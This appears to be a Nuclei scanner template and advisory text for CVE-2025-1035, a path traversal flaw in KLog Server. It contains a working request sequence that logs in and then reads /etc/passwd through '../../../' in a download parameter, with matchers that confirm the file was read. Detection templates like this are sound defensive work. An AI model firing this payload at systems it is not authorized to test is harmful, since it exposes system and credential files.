Description
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Komtera Technolgies KLog Server allows Manipulating Web Input to File System Calls.This issue affects KLog Server: before 3.1.1.
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Komtera Technolgies KLog Server allows Manipulating Web Input to File System Calls.This issue affects KLog Server: before 3.1.1.
id: CVE-2025-1035
info:
name: KLog Server - Path Traversal
author: s4e-io
severity: medium
description: |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Komtera Technolgies KLog Server allows Manipulating Web Input to File System Calls.This issue affects KLog Server: before 3.1.1.
impact: |
Authenticated attackers can exploit path traversal vulnerabilities to read arbitrary files from the KLog Server, potentially exposing sensitive system files, configuration data, and stored logs.
remediation: |
Upgrade to KLog Server version 3.1.1 or later that addresses the path traversal vulnerability.
reference:
- https://www.byresearchers.net/2025/02/cve-2025-1035-klog-server-31.html
- https://www.usom.gov.tr/bildirim/tr-25-0037
- https://www.cve.org/CVERecord?id=CVE-2025-1035
classification:
epss-score: 0.09861
epss-percentile: 0.95314
cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 5.7
cve-id: CVE-2025-1035
cwe-id: CWE-22
metadata:
verified: true
max-request: 2
vendor: klogserver
product: klog_server
tags: cve,cve2025,klog-server,lfi,vuln
variables:
filename: "{{to_lower(rand_text_alpha(6))}}"
http:
- raw:
- |
POST /actions/entree.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pswd={{password}}&action=login
- |
GET /actions/download.php?action=web&file=../../../etc/passwd&name={{filename}}.zip HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body_2)"
- 'contains_all(header_2, "application/octet-stream", "filename=")'
- 'status_code_2 == 200'
condition: and
# digest: 490a00463044022022263ab681ab24b1c003b0eca0d129da04d3efeacca16b4e3247f21c673a0e9f022048f74c4dd915ddd2032a84810065e5f8a83715a339e70a51d32801a150d2234b:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.